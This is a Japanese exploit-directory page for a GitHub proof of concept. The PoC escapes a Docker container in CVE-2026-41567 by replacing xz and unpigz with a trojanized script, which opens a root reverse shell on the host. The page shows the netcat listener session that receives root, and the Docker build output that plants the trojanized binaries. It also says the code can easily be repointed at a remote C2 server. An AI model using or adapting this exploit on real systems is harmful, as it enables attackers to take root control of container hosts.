Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-41567 — CVE-2026-41567のDockerエスケープを悪用し、トロイの木馬化されたxz/unpigzバイナリを使用して、コンテナ内からホスト上でrootシェルを取得します。 | Kitploit
ツール/GitHubGitHub/berdav/cve-2026-41567
脆弱性分析エクスプロイトコンテナエスケープ
GitHubberdav/cve-2026-41567

CVE-2026-41567

CVE-2026-41567のDockerエスケープを悪用し、トロイの木馬化されたxz/unpigzバイナリを使用して、コンテナ内からホスト上でrootシェルを取得します。

リポジトリを見る
1日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-41567 1day

Docker Escape CVE-2026-41567 の 1day です。

トロイの木馬化された xz / unpigz を使った docker escape のデモです。

リモートで使用するように簡単に変更できます(つまり、docker のデフォルト IP をリモート C2 に変更するだけです)。

エクスプロイトの詳細はこちら

PoC

ホスト上でポート 50005 の netcat リスナーを実行します。

root@kitploit:~
ubuntu@ubuntu-noble:~/CVE-2026-41567$ nc -vlp  50005
Listening on 0.0.0.0 50005
Connection received on ubuntu-noble 35722
# whoami
root
# cat /etc/hostname
ubuntu-noble
# exit

次に、test.sh スクリプトを実行します。 エクスプロイトが機能していれば、すぐに root シェルが取得できます。

root@kitploit:~
ubuntu@ubuntu-noble:~/CVE-2026-41567$ sudo ./test.sh
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
            Install the buildx component to build images with BuildKit:
            https://docs.docker.com/go/buildx/

Sending build context to Docker daemon  19.97kB
Step 1/7 : FROM debian
 ---> 34cd9e9fd437
Step 2/7 : RUN apt update && apt install -y ncat
 ---> Using cache
 ---> c85c9eb10bff
Step 3/7 : COPY exploit.sh /usr/bin/xz
 ---> Using cache
 ---> b84efa8058e7
Step 4/7 : RUN chmod +x /usr/bin/xz
 ---> Using cache
 ---> 423b0e1891a6
Step 5/7 : COPY exploit.sh /usr/bin/unpigz
 ---> Using cache
 ---> 74eff85cf988
Step 6/7 : RUN chmod +x /usr/bin/unpigz
 ---> Using cache
 ---> 2f773fa12931
Step 7/7 : CMD [ "sleep", "9999999" ]
 ---> Using cache
 ---> 7b99f12dbe8d
Successfully built 7b99f12dbe8d
Successfully tagged cve-2026-41567:latest
cve-2026-41567
5679a4dc643c65a20039de693fad1f1caeea7fe5760b5c4049d1d4f37f5ab825
tar: Removing leading `/' from member names
/etc/hosts
Successfully copied 0B to cve-2026-41567:/tmp

Docker デーモンと通信する権限(通常は root であること)が必要なことに注意してください。

ツールをダウンロード